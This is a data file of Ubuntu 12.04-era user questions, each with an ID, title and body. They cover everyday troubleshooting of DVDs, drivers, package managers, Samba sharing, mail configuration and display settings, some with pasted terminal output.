200830	dvds not able to play in vlc nor movie player , 12.04	im trying to play a movie on my ubuntu machine using vlc or movie player . the source of the movie is a dvd . both players say the same thing . they say the dvd cant be opened because the dvd is encrypted ... i checked for updates but there wasnt any soooo . any ideas ? thanks alex my sisters ubuntu machine does the same thing with a different movie .
200832	dvds and cds not recognized	i have ubuntu 12.04 lts installed on my computer ( sony vaio vgn-ns205n ) . it reads some cds and dvds just fine , but many others it will not recognize at all , or will only recognize after opening and closing the cd tray many times . it just shows the cd/dvd drive as being empty and wo n't show that anything is on there at all . i have a few dvds ( from the same publisher ) that work every time . this comes up most often when trying to show my kid bob the builder , etc . some data cds i would like to work with also have the same issue . it 's not a hardware or defective disc problem , since all these will play in windows on the same machine . it 's just really annoying to have to switch operating systems to play videos or get data off discs . all the searches i have done people recommend installing medibuntu and other repositories . i have and they are all up to date . no change . any help that works would be greatly appreciated .
200834	un-install 32bit ubuntu and install 64bit ubuntu ?	i had a windows 7 operating system , i then wrote over that os with ubuntu 11.10 . this heavily increased my disk space , but since i installed a 32bit version of ubuntu onto my once 64bit os my ram was cut in half . how exactly do you uninstall the 32bit and install the 64bit when you have no windows to go back to and no cd-rom drive ? ( i installed ubuntu with a flash drive )
200835	how to configure apache / php / postfix website emails when using vhosts ?	i have a lamp webserver configured to serve multiple websites . each virtual host has various php applications , mainly wordpress . when users sign up to the wordpress sites , email is sent by php through to postfix , and then on to the receiver . the problem is that postfix is identifying itself to the remote server with the contents of /etc/hostname , which is not a fully qualified domain name . some mail servers reject this and the mail bounces . additionally , the return path is being set to one of the vitual host domains , seemingly at random . i could set /etc/hostname to one of the website domain names , but then the emails from the other websites would have a wrong server in the headers , and this would not fix the return-path issue . possibly related , apache2 says `` could not determine the server 's fully qualified domain name '' on startup . how do i fix this so that each website can send email without revealing the other websites hosted on the server ? example error : oct 15 20:29:32 ubuntu-1204-precise-64-minimal postfix/smtp [ 17214 ] : cd087e00df6 : to= < ***** @ ******* . ** > , relay=spool.mail.gandi.net [ 217.70.184.6 ] :25 , delay=0.29 , delays=0.12/0/0.09/0.07 , dsn=5.5.2 , status=bounced ( host spool.mail.gandi.net [ 217.70.184.6 ] said : 504 5.5.2 < ubuntu-1204-precise-64-minimal > : helo command rejected : need fully-qualified hostname ( in reply to rcpt to command ) ) i have now set the fqdn in /etc/hosts and /etc/hostname , and restarted apache2 and postfix , and it still gives this same error . i do n't even know where it is still getting the old hostname from as it is no longer stored anywhere on disk .
200840	hp pavilion p7-1235 windows works but ubuntu turns off	i 've just done a clean install of ubuntu 12.04 on an hp p7-1235 which runs windows 7 just fine . every time i try running ubuntu it randomly shuts off . no freezing , no overheating ... my screen goes blank and then nothing . i 've installed the desktop version , the server version and ran it from the live cd and each time i have the same problem . any help would be appreciated .
200853	removing ttf-mscorefonts-installer	the package ttf-mscorefonts-installer is showing up in update manager as having been downloaded but not installed . when i run sudo apt-get remove ttf-mscorefonts-installer i get the message dpkg : warning : there 's no installed package matching ttf-mscorefonts-installer : amd64 i ca n't uncheck the box next to ttf-mscorefonts-installer in the update manager interface , and i ca n't install any other updates because i get the error message requires installation of untrusted packages the action would require the installation of packages from not authenticated sources . how do i get rid of ttf-mscorefonts-installer so that it stops causing problems ?
200854	is there any dictionary on ubuntu that comes with built in pronunciation ?	i am in badly need of a good off-line dictionary that has pronunciation support . i mean i can hear the pronunciation of the word i search with it 's meaning and others . is there any for ubuntu ?
200860	software center crashes and terminal errors	i 'm a new user to ask ubuntu and i 've only recently switched to ubuntu 12.04 . when i try to open the software center ( ubuntu 12.04 32-bit ) it will flash open , load for maybe 1-2 seconds , and then close . when i try using : sudo apt-get purge software center sudo apt-get install sudo apt-get update sudo apt-get upgrade i get this within the terminal : reading package lists ... error ! e : problem parsing dependency depends e : error occurred while processing printer-driver-hpcups ( newversion2 ) e : problem with mergelist /var/lib/dpkg/status e : the package lists or status file could not be parsed or opened . the problem fixed itself after i shut down my laptop for the night and turned it back on to check my e-mail this afternoon . if anyone could tell me how to fix this problem in the future do , i would like to learn about these kind of things because i do n't plan on putting windows on my laptop again : p
200862	reverting to gnome classic after kernel update	i 'm using ubuntu 12.04.1 with gnome 3 , and it just updated the kernel from 3.2.0-31 to 3.2.0-32 . now , gnome reverts to classic mode . i can confirm that it is the kernel , because if i select 3.2.0-31 from grub , gnome 3 works properly again . i have a radeon hd 7850 , and i have the latest , proprietary graphics drivers installed . i have n't gone through the pain of reinstalling them yet , because i 'm hoping that there 's an easier way to resolve this .
200864	my asus netbook , model 900hd xp wo n't let me resize the hd	i can get `` gparted : '' to open up , but nothing in the window responds as though the netbook is protecting its ' hd , as hal did in 2001/2010 , a space odyssey > > lol . any idea why
200865	external monitor is blank if i boot with the monitor plugged in	ubuntu 12.04 has problem with intel gm45 chipset , featuring the the mobile intel速 graphics media accelerator ( gma ) 4500mhd i have a compaq presario cq70 laptop with an intel gm45 chipset that features the mobile intel速 graphics media accelerator ( gma ) 4500mhd . i was using the second hdmi video port to drive both a projector or a second monitor . everything was working fine under ubuntu 8.04 , 9.04 , 10.04 and 11.04 , however , when i upgraded to 12.04 the second monitor stopped working . what i mean when i say stopped working is : boot with monitor plugged in . blank screen ! power off , unplug monitor and power on everything works . plug in monitor ( only mode that works in mirror mode ) two monitors that look same . close laptop lid . screen goes blank only option for useful system is power off and unplug monitor . if i attempt to adjust the monitor to maximum resolution that the monitor will handle and turn off mirror mode nothing can be moved onto that screen . this all worked fine with earlier versions of ubuntu , is there a notes about the changes to the graphics management system in 12.04 , like there is for the resolver change ?
200868	where is the dvd/cd image ubuntu 12.04	so i downloaded ubuntu 12.04 desktop to make a dvd but all i got was zipped files . i looked at the make dvd instructions but it tells me to burn the image file not a whole bunch of files . please help .
200869	live os freezes on purple screen	i am also facing same problem . i have already installed opensuse , fedora17 ( facing some problems so deleted ) . but 12.04 is giving me issues . i was able to install 10.04 on my machine by wubi . later on i have tried all the versions of ubuntu but unable to get it worked . please help me i am starving here , i want to use unity : ' ( or help me installing unity on my opensuse12.01 . i tried same copy on dell inspiron by my usb and it 's booted in few seconds but my laptop does n't . one more thing i would like to mention . my all os 's ( except windows : p ) freezes after installtion till the installation of graphics driver of 'nvidia 8200m ' by command line .
200871	how can i install ubuntu using wubi without internet connection ?	i have downloaded ubuntu desktop 12.04 lts iso from a computer with high speed internet connection and i like to install it in my laptop without internet connection ( i already have iso ) or dvd drive ? ! i remember that in older versions of ubuntu it was possible to install directly from windows desktop without booting into live cd . is that feature still available in new versions or is there any way to get it installed without using usb drive and internet ? ! any help is appreciated . thanks in advance . i am sorry . solution for this question was simple . download windows ubuntu installer ( wubi ) and place both iso and wubi files in one folder and run wubi.exe . thats it ! ! ..
200875	getting link to file in ubuntu folder	i have a file in the ubuntu thunderbird attachment folder , and it has been synced to the cloud . but in thunderbird a link was never created in the email i wanted to send . how can i get a link i can send in email ?
200876	qute -- worthy or what 's its analogue ?	friends , i wanted to use qute on my ubuntu 12.04 . there are a couple of problems : it relies on a dead project . one has to compile the files there . the question now is : is it worth the pain to install this thingy ? if the answer to the previous question is no , then what is an alternative ? for one , i was suggested that retext might be a good option , if i wanted markdown . but , the tex support in retext does not sound great . please help me .
200877	ubuntu on android for samsung galaxy note 2 ?	this question is lengthy , i have to warn you . i 'm generally a mac user . my setup currently consists of using mac osx and vmware ( windows 7 ) to run one program that is n't compatible with osx or linux . this program can be run using crossover ( wine ) as well but it works better with vmware . i 'm thinking of switching over to ubuntu as my main operating system on my computers and running vmware or crossover that way to access the program i need . no specific reason why , i guess i 'm just sick of the apple/windows machine . i 've always wanted to try linux so figure there is no better time than now . the point is i have n't used ubuntu yet so i do n't know a lot about it . i was planning on buying the iphone 5 when i saw there is an app to setup ubuntu operating system on an android phone . i 'm now thinking that this would be fantastic for me if i bought the samsung galaxy note 2 and was able to install ubuntu and either vmware or crossover to use my windows specific program for work right on my phone . the samsung galaxy note 2 has a 1.4 ghz processor and 2gb of ram which is enough to handle a modern operating system . my program does not need a lot of speed or memory to work . to be honest , the windows specific program i need would work fine on an old laptop running windows xp . my first question is if ubuntu for android is really the full operating system that lets you run programs just like a desktop pc ? is it super slow where it takes many minutes to load up ubuntu ? i do n't need blazing speeds , but i 'd like something useable . my next question has to do with vmware or crossover . is ubuntu for android capable of running these programs ? i think it would be great to use the same operating system like ubuntu on my desktop , laptop , tablets , and phone . thanks so much for all the help ! ! !
200879	windows 8 release preview bsods in virtual box	i have an ubuntu 10 . 04 and windows 7 installed on computer . now i would like to try windows 8 on virtual box ose . i have a windows 8 release preview iso disk in a pendrive and added ide primary slave as it ide primary slave ( cd/dvd ) : windows8-releasepreview-32bit-english.iso ( 1.64 gb ) this is my windows 8 virtual box settings . and what i see when i start windows 8 is what is the problem ? my system ram is 2.00 gb where 1.85 is usable ? how can i fix this problem ?
200881	how to share files between rhel and ubuntu	i have installed rhel 5.5 on virtual box and host system is ubuntu 12.04 . i can access the files of ubuntu by using the sharing services of virtual box . but how can i access the files of rhel which is installed on virtual box ? ? ? ? ? ?
200883	why ubuntu always force itself to be in 1440x900 resolution ?	my screen 's resolution is 1024x768 and when i installed ubuntu it was forcefully in 1440x900 . i changed it in my account and again i 've to change it in another standard account . i do n't know any way to change it in login screen . also when shutting down that black screen with some commands also appears in 1440x900 . i do n't know why ubuntu force itself to be in 1440x900 . i want 1024x768 in whole way . i do n't know whether it is required but i have intel chipset 128 mb .
200886	downloading langage packs makes the installation process take a long time .	when installing while connected to the internet , downloading language packs can take a long time . ( original message ) : why mandatory install slow load huge language pack.native user applaud.chosen at install already practical.window install on request only .
200890	strange right click problem ?	last night i installed some applications and updated my ubuntu 12.04 lts , since then i encountered a strange right click problem , that is my right click is not working but when i open home folder from launcher right click works again . actually problems starts last night when my desktop wallpaper changes suddenly to ubuntu default , when i tried to change wallpaper i find that my right click is not working . i tried to reboot system but that also not solved my problem , i clicked here and there but when i opened the home folder my wallpaper changed again to previous one and when i checked the right click it is also working . now the problem is that this problem comes back again whenever i turn on my system , and also whenever this problem occurs the ubuntu desktop menu bar also disappears from unity top panel . do n't know what is really going on , please can anybody help me .
200892	wireless is n't working on lenovo t400	this problem started after upgrading to 12.04 , an my system is 'up2date ' have tried most of the solution-proposals found on the net . lspci -nnk | grep -ia2 net 00:19.0 ethernet controller [ 0200 ] : intel corporation 82567lf gigabit network connection [ 8086:10bf ] ( rev 03 ) subsystem : lenovo device [ 17aa:20ee ] kernel driver in use : e1000e -- 03:00.0 network controller [ 0280 ] : intel corporation pro/wireless 5100 agn [ shiloh ] network connection [ 8086:4237 ] subsystem : intel corporation wifi link 5100 agn [ 8086:1211 ] kernel driver in use : iwlagn iwconfig > lo no wireless extensions . > eth0 no wireless extensions . > wlan0 ieee 802.11abgn essid : off/any mode : managed access point : not-associated tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off sudo lshw -c network *-network description : ethernet interface product : 82567lf gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 03 serial : 00:22:68:1a : c4:75 size : 100mbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=1.0.2-k2 duplex=full firmware=1.8-3 ip=192.168.2.154 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:29 memory : fc000000-fc01ffff memory : fc024000-fc024fff ioport:1820 ( size=32 ) *-network disabled description : wireless interface product : pro/wireless 5100 agn [ shiloh ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 00 serial : 00:26 : c6:6c:2d:24 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn latency=0 multicast=yes wireless=ieee 802.11abgn resources : irq:30 memory : f4300000-f4301fff please help
200898	share files - ubuntu 12.04 and windows 7 - one network - password not accepted	i ask this question in superuser but no one helps me . i hope to get more attention here . i have three computers connected in one network by modem . i want to share files in this network in the most easy way ( i have read about solutions using samba ) . so , i have three machines : one with windows 7 one with windows xp one with ubuntu 12.04 and i have the following situation : the windows pcs can share files between each other . the windows pcs can see that ubuntu 's one is in the network the pc with ubuntu can see only the pc with windows 7 , but when i click on a folder it ask to enter the network password and it is not accepting it ( i am 100 % sure it 's the correct one ) is there to fix this situation a little bit - at least to enable the file sharing between the ubuntu and windows 7 pcs or i should choose a different approach ( please advice ) .
200900	how do i determine what device my dvd drive is mapped to ?	sometimes my cd-rom is mapped to /dev/sg0 and sometimes to /dev/sg1 . how do i detect the currently mapped device in a bash script ?
200901	lubuntu from usb	i have an acer aspire 1362 laptop with amd sompron 2800+ processor and only 256mb ram , with windows xp installed . i have downloaded lubuntu-12.04-alternate-i386.iso and installed it to a 16gb usb stick . i do not want to install lubuntu on my hard drive ( yet ! ) . i have got the usb stick to boot , and am working my way through the menu . at one stage , the installer wants to partition my hard drive , so i abort the installation . there does n't seem to be an option on the menu to boot and run lubuntu from the usb stick without putting stuff on the hard drive . how can i achieve this , please ?
200903	pen drive can not be mounted	i get the following message when i insert my pen drive to usb port . i am unable to format it as well . ( this pen drive earlier used as a bootable drive for ubuntu 12.04 ) i am using ubuntu 12.04 lts . lsusb command in the terminal gives the following message : siva @ siva : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 0424:2513 standard microsystems corp . bus 002 device 002 : id 0424:2513 standard microsystems corp . bus 001 device 003 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 001 device 004 : id 1c4f:0002 sigma micro keyboard tracer gamma ivory bus 002 device 003 : id 05ac:8242 apple , inc. ir receiver [ built-in ] bus 002 device 004 : id 093a:2510 pixart imaging , inc. optical mouse bus 001 device 007 : id 05ac:8281 apple , inc . bus 001 device 008 : id 0951:1653 kingston technology
200904	does a cd-rom drive also have a uuid like a hard drive ?	does a cd-rom drive also have a uuid like a hard drive ? how do i determine what the uuid is ?
200906	ubuntu 12.04.1 update manager and synaptic package manager not working	recently installed ubuntu 12.04.1 , 64bit on intel quad core system . there is a red circle with a white 'minus ' sign on the upper right hand corner . in the end of a long message displayed below the red circle in 'grey ' says that installed packages have unmet dependencies . none of the following is working . ubuntu software center not opening . update manager could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_precise-updates_multiverse_binary-i386_packages , e : the package lists or status file could not be parsed or opened . ' 3 . synaptic package manager an error occured the following details are provided e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_precise-updates_multiverse_binary-i386_packages e : the package lists or status file could not be parsed or opened . e : _cache- > open ( ) failed , please report . otherwise , the computer is working fine with broadband wifi internet . installplease help .
200911	how to prevent access to a folder by other users ?	i want to disallow reading of files in my home directory by other users . how should i accomplish this ? should i use encryption ? if so , how do i do that ?
200915	how to map network scanner	i have just bought a shiny new canon mg6250 multifunction printer/scanner and connected it via lan . installing the printing side of things was a breeze , however , i can not work out how to set up scanning . i installed the mg6200 series scangear mp driver from canon 's site but when i open gimp or simple scan , they say there is no scanner detected . using gimp 's 'update scanner list ' button to search for the scanner does not find it . how do i tell ubuntu , gimp or simple scan to look on the network for the scanner ? is there another utility especially for this ?
200922	how to reinstall a apt-get dist-upgrade ?	i already have the latest version of ubuntu 12.04.1 . i want to reinstall every package again ( a dist-upgrade reinstall ) . how do i do that ? sudo apt-get dist-upgrade only works one time . i want to reinstall again ( to fix some things i broke in ubuntu ) .
200923	what scenarios causes a hard drive uuid to change ?	what scenarios causes a hard drive uuid to change ? are there any manufacturer assigned unique ids for hard drives that is less likely to change ?
200926	ssh multiple clients	hi i am new to ssh server but i have successfully been running it on other ubuntu 12.04 computers . the latest computer i set up with openssh-server only seems to allow one shared connection between all the clients . i never had this problem before with the other computers and i checked the config files are the same as other computers that allow multiple connections . also this openssh server shows a bar at the bottom of all the clients ssh terminal windows displaying the ubuntu version , time of connection , date , cpu . i do n't have this on other setups and have tried reinstalling openssh-server . what program or option is causing this ?
200929	focus existing terminal with `ctrl-alt-t` shortcut	i tend to use the terminal a lot , so i wondering if there is a way i can make ctrl+alt+t focus the existing terminal if there is one , otherwise create a new terminal ?
200930	ca n't find bin folder in my minecraft folder !	i 've installed minecraft a long time ago and currently running on the 1.3.2 version . the ubuntu 's version i 'm currently using is 12.04 . i 've decided to install some mods on my minecraft , did a lot of research , and found out that the mod folder should be placed in the bin folder in minecraft . but here comes the problem , i do n't have a bin folder in my minecraft.jar folder ! ( i 've also installed a new skin without any problems onto the 1.3.2 version of minecraft ) any help would be appreciated
200936	ubuntu 12.04/12.10 opengl games fullscreen slow	opengl games running in ubuntu 12.04 and ubuntu 12.10 in fullscreen mode very slow . fps is very low ( it lags ) . when i switch in the game settings in windows mode ( same resolution 1680*1050 ) the game runs perfectly . graphics : nvidia geforce gtx 460 driver : nvidia 304.48 ( i now use a beta driver , but in the older drivers the games are slower . )
200937	how to install ubuntu from iso file using grub1	i 've got ubuntu 10.04 installed on a computer and i am trying to do a fresh install of 12.04 . i never had problems booting from a usb stick on it before and usb is setup as the first boot order in bios . according to bios the usb stick is recognized at boot on the computer . and the usb stick works on another desktop computer i have tested it on . since i already have ubuntu installed and i can access grub command line just after rebooting . is there anyway i can manually get it to boot the usb stick from the grub command line or something similar ? i 've tried both startup disk creator and unetbootin .
200938	question about gtkscrollbar class in custom themes	i very much like to use the zukitwo theme as an alternative over the standard ambiance theme , it is to my taste more easy on the eyes . however , the theme takes away the scrollbar arrows or `` steppers '' ( which are normally part of the scrollbars in e.g . thunderbird and firefox in the ambiance theme ) . i found this information : https : //live.gnome.org/gnomeart/tutorials/gtkthemes/gtkscrollbar and was looking around in the gtk stylesheets of the theme : /usr/share/themes/zukitwo-dark/gtk-3.0/gtk-widgets.css but i have no experience at all in editing themes to get the arrows back in place again . i was trying to put in there the `` gtkscrollbar-has-forward-stepper '' and `` gtkscrollbar-has-backward-stepper '' commands set to `` 1 '' , but with no effect after reboot . could someone perhaps point out to me what tweaks to make to reinstate the scrollbar arrows ? i would be happy to learn more about this ! all help is much appreciated !
200943	how to create deb files	i have a group of bash scripts , xml files , etc . the scripts require that some programs already be installed . how do i create a *.deb on ubuntu that will make sure that dependencies are satisfied and put my scripts and files where they need to be ?
200949	how do i install unity-lens-shopping ?	i am trying to install the unity-lens-shopping app . i 've downloaded unity-lens-shopping-6.8.0 . when i ran ./configure the first time it complained i did not have the valac compiler . i went to the ubuntu software center and installed it from there . this installed version 0.14.2 . then when i ran ./configure it said it complained configure : error : vala 0.16.0 not found . i went to `` https : //live.gnome.org/vala/release '' and downloaded vala-0.18.0 . when i run ./configure in there i get `` configure : error : flex not found but required '' . is there an easier ( aka shorter ) way to get the lens installed ?
200951	which folder contains executable 's launcher file ?	just a small query that in which folder application launcher is stored . like when i typed whereis everpad it gave me multiple locations but when i checked for launcher it was no where to be seen .
200952	what is a desktop recorder with global shortcuts ?	my os is ubuntu 12.04 . i searched on google hundreds of times and i could n't find any solution for desktop recorder software . there is the kazam unstable version , but shortcut keys did n't work . i need a stable desktop recorder with keyboard shortcuts . there are many options on windows for this . but on ubuntu , i could n't find a desktop recorder with global keyboard shortcuts .
200953	how to change xfce4.8 windows buttons horizontal size ?	in my opinion , xfce buttons size a bit too big . where i can change it ? provided gtk tool does n't have that option and i think everythink are in some configuration file , but do n't now where is it . image :
200958	how to get back sudo previledges ?	i have been given a laptop with ubuntu 9.10 installed . it has only one user . the problem is sudo is disabled and thus i cant use it to do anything . reinstalling ubuntu is not an option as the institute im in current studying in has some net problems and i can not download the newer os ( & i urgently need sudo ) . also the person who has given me the laptop doesnt know anything about this . please help .
200959	how to install paltalk messenger ?	i tried to install paltalk messenger in playonlinux app , it got installed but showed an error : / is there a way to install paltalk messenger in ubuntu ?
200960	how to upgrade ubuntu 11.04 to 12.04	i did n't see this asked elsewhere here , but how does one go about this ? i did sudo apt-get update & & sudo apt-get upgrade on a laptop last night but it did not upgrade up to the latest release as i expected . what do i need to do ? in other words : why did it do a partial-upgrade instead of a release-upgrade ?
200961	i get an error when i try to mount a disk to more that one mount point	when i try and mount a disk to two mount mounts i get the following error : mount is denied because the ntfs volume is already exclusively opened . the volume may be already mounted , or another software may use it which could be identified for example by the help of the 'fuser ' command . how do i prevent this message from displaying ?
200974	how can i set the date format to my country setting ?	i am german , but i use only english software . hence , i am also using english ubuntu . it 's not because i do n't know how to install german ubuntu . it 's because i prefer to work with english software environment . however , i would like to keep date & time format in german format , just as i use a german keyboard layout in english ubuntu . i can set the time format to 24h time . but how can i set the date format to german time format ? it is irritating for me to have the day number before the time numbers : in other words , instead of `` oct 14 15:16 '' i want it to display `` 14 okt '' or ( if only english language is available ) `` 14 oct 15:16 '' or `` 14th oct 15:16 '' . at least , the number of the day should be displayed before the month . in windows , it was no problem to choose time/date/currency settings according to a chosen country . where can i do this in ubuntu ? the best would be if i could freely enter the date/time format myself with variables ( dd.mm hh.mm.ss etc ) . i found answers for ubuntu 11.04 , but not for ubuntu 12.04 . i am using ubuntu 12.04 , 64-bit . keep in mind that i am a beginner . so i 'd like to be able to do this via gui , if possible . edit : i found the answer in a forum . go to system settings ... and choose language support . there are two tabs , language and reginal formats . you are by default on the language tab . on the language tab , click install / remove languages . a window with a list of languages opens . mark the language ( s ) you want to add for your time/date/currency format . click apply changes . ubuntu will now download and install the additional language files , as well as help files of other applications in this language . so do n't be irritated . when ubuntu has finished applying the changes , switch to regional formats tab . ( do not change the language for menus and windows on the language tab if you only want to change the date/time/unit format ) . there you can choose from the dropdown list the language for your preferred format for date/time/currency/unit . log out and log in again to have the changes take effect .
200981	dvd-drive detected by bios and uefi but not by ubuntu 12.04	i have build a new tower containing ; asrock z77 extreme4 ( motherboard ) core i7 ( processor ) hitachi lge-dmgh 12 l ( b ) gh15f sata ( sata dvd-drive ) problem is ; bios and uefi has no problems detecting the dvd-drive but it is not detected by ubuntu 12.04 . it is not present in /etc/fstab or /etc/mtab . i have now upgraded to 12.10 but i still have the same problem ... -any ideas ... ? below is the contents of fstab and mtab . thanks for all your help . fstab : # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=f007bc60-da4c-4f36-99a7-77083c5f3654 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=5d59949c-aed9-442a-877d-5abf1ccaadc3 none swap sw 0 0 mtab : /dev/sda1 / ext4 rw , errors=remount-ro 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 sysfs /sys sysfs rw , noexec , nosuid , nodev 0 0 none /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 udev /dev devtmpfs rw , mode=0755 0 0 devpts /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 tmpfs /run tmpfs rw , noexec , nosuid , size=10 % , mode=0755 0 0 none /run/lock tmpfs rw , noexec , nosuid , nodev , size=5242880 0 0 none /run/shm tmpfs rw , nosuid , nodev 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , noexec , nosuid , nodev 0 0 gvfs-fuse-daemon /home/tom/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , user=tom 0 0
200983	ca n't install anything via terminal in 12.04	note i am running off an 8gb usb with 4gb persistence enabled , no its not because of this because yesterday i had it all setup and working with everything downloading properly , then i made a new user account and after i set no password for it , it kept asking me for the password so i formatted my usb again and went back to step one : ) i have ubuntu working , i can install from software center , even though i get an error code it still installs : ) i 'm trying to install ubuntu tweak and cinnamon via terminal and i was told i do it by typing this into a terminal : sudo add-apt-repository ppa : tualatrix/ppa sudo apt-get update sudo apt-get install ubuntu-tweak i got this error from the terminal fetched 1,592 kb in 1s ( 1,327 kb/s ) selecting previously unselected package gir1.2-gconf-2.0 . ( reading database ... 173066 files and directories currently installed . ) unpacking gir1.2-gconf-2.0 ( from ... /gir1.2-gconf-2.0_3.2.5-0ubuntu2_amd64.deb ) ... selecting previously unselected package gir1.2-unique-3.0 . unpacking gir1.2-unique-3.0 ( from ... /gir1.2-unique-3.0_3.0.2-1_amd64.deb ) ... selecting previously unselected package python-lxml . unpacking python-lxml ( from ... /python-lxml_2.3.2-1_amd64.deb ) ... selecting previously unselected package python-compizconfig . unpacking python-compizconfig ( from ... /python-compizconfig_0.9.5.94-0ubuntu4_amd64.deb ) ... selecting previously unselected package ubuntu-tweak . unpacking ubuntu-tweak ( from ... /ubuntu-tweak_0.8.0-1~precise1_all.deb ) ... processing triggers for gconf2 ... processing triggers for libglib2.0-0 : i386 ... processing triggers for libglib2.0-0 ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... setting up linux-image-3.2.0-32-generic ( 3.2.0-32.51 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-32-generic /boot/vmlinuz-3.2.0-32-generic update-initramfs : generating /boot/initrd.img-3.2.0-32-generic cryptsetup : warning : failed to detect canonical device of overlayfs cryptsetup : warning : could not determine root device from /etc/fstab run-parts : executing /etc/kernel/postinst.d/pm-utils 3.2.0-32-generic /boot/vmlinuz-3.2.0-32-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.2.0-32-generic /boot/vmlinuz-3.2.0-32-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-32-generic /boot/vmlinuz-3.2.0-32-generic /usr/sbin/grub-probe : error : can not find a device for / ( is /dev mounted ? ) . run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-32-generic.postinst line 1010. dpkg : error processing linux-image-3.2.0-32-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.2.0-32-generic ; however : package linux-image-3.2.0-32-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.32.35 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured setting up gir1.2-gconf-2.0 ( 3.2.5-0ubuntu2 ) ... setting up gir1.2-unique-3.0 ( 3.0.2-1 ) ... no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . setting up python-lxml ( 2.3.2-1 ) ... setting up python-compizconfig ( 0.9.5.94-0ubuntu4 ) ... setting up ubuntu-tweak ( 0.8.0-1~precise1 ) ... errors were encountered while processing : linux-image-3.2.0-32-generic linux-image-generic linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) edit : step one is formatting my usb within windows , then using universal usb installer to reinstall linux on my usb and trying again , and still , anyone got iny ideas on this , really wan na get cinnamon and other things working , also somehow ive managed to get ubuntu tweak working : d
200984	only root-permissions to usb-drive after formatting with gparted	i formatted my external usb-drive with gparted to ext2 file system . after that the usb-drive is automounted with root-permission and now i only can write with sudo to the drive . of course i can change the permissions manually ( chmod ) , but the behavior i want is that by inserting the drive it gets automounted with permission 7 independent of which user is logged in , like an usual usb-drive does . i hope my question is clear enough , if not i 'll can clarify , just ask . thx in advance ! !
200986	samba folder is gone	i seem to have some issues sharing folders from my ubuntu 12.04 machine to a win7 machine . after playing around with the settings , i decided to revert to samba 's original setting by reinstalling it : sudo apt-get purge samba sudo rm -rf /etc/samba/ /etc/default/samba sudo apt-get install samba just to be sure i also run : sudo apt-get install samba samba-common system-config-samba winbind now , i ca n't find /etc/samba folder any more . even when i try to share a folder through nautilus , i get : samba 's testparm returned error 1 : load smb config files from /etc/samba/smb.conf rlimit_max : increasing rlimit_max ( 1024 ) to minimum windows limit ( 16384 ) params.c : openconffile ( ) - unable to open configuration file `` /etc/samba/smb.conf '' : no such file or directory error loading services . same when i try to list : xxx @ xxx : ~ $ ll /etc/samba ls : can not access /etc/samba : no such file or directory any ideas what i did wrong , or what other package am i missing ? cheers
200989	ping for 4 times	usually i use ping to check my internet connection . in windows , if i use : ping google.com i get only 4 information ping , but on ubuntu , if i use that command , the ping can ' stop until i stop it with ctrl+c . can i ping only for 4 times then stopped ? if i can , can i use it as default ?
